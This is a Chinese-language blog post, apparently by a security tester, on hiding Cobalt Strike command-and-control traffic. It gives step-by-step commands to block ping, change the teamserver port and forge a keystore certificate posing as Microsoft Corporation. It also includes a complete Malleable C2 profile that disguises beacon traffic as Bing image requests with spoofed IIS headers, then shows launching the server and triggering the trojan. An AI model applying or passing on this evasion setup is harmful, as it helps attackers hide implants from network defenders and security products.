Cobalt Strike特征隐藏和流量加密

Cobalt Strike特征隐藏和流量加密

因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。
悲报，还被提交了工单。
做安全测试不要用公司网！不要用公司网！不要用公司网！

---

服务器开启禁Ping

命令：

vim /etc/sysctl.conf

添加一行

net.ipv4.icmp_echo_ignore_all = 1

保存，然后刷新配置

sysctl -p

修改Cobalt Strike默认端口

编辑teamserver文件
修改50050为其他端口

修改CS默认证书

Cobalt Strike默认证书中含有与cs相关的特征，安全设备均已设置检测规则。

首先可以通过xftp删除服务端Server目录下的cobaltstrike.store

利用keytool生成新的一个无特征的证书文件cobaltstrike.store

keytool -keystore cobaltstrike.store -storepass test -keypass test -genkey -keyalg RSA -alias test -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
# 也就是这个格式，可自由替换中文部分内容：keytool -keystore 生成的store名 -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias 自定义别名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

keytool是一个Java 数据证书的管理工具，使用如下：

-keytool -keystore cobaltstrike.store -storepass 密码
-keypass 密码
-genkey -keyalg RSA
-alias google.com -dname "CN=(名字与姓氏),
OU=(组织单位名称), O=(组织名称),
L=(城市或区域名称),
ST=(州或省份名称),
C=(单位的两字母国家代码)

常用keytool命令

查看证书文件：keytool -list -v -keystore cobaltstrike.store

修改证书密码：keytool -storepasswd -keystore cobaltstrike.store

修改alias别名：keytool -changealias -keystore cobaltstrike.store -alias sourame -destalias new_name

证书生成完毕后，查看一下是否是新的证书内容

建议同时修改teamserver中的keytool，防止证书被删除后自动生成默认证书。

C2profile混淆流量

在CS服务器上新建一个c2profile

编辑c2profile的内容如下，可自由修改部分内容
https://github.com/xx0hcd/Malleable-C2-Profiles

http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.bing.com";
        header "Host" "www.bing.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";
            uri-append;
        }
    }

    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com";
        header "Host" "www.bing.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}

然后使用c2profile方式启动teamserver

./teamserver 110.41.xx.xxx test c2profile

开启CS的监听，触发木马
使用wireshark抓取数据包，查看流量特征是否被混淆
发现请求改成了我们在c2profile中编写的URL、UA等信息时，则修改成功。

（请求了www.bing.com）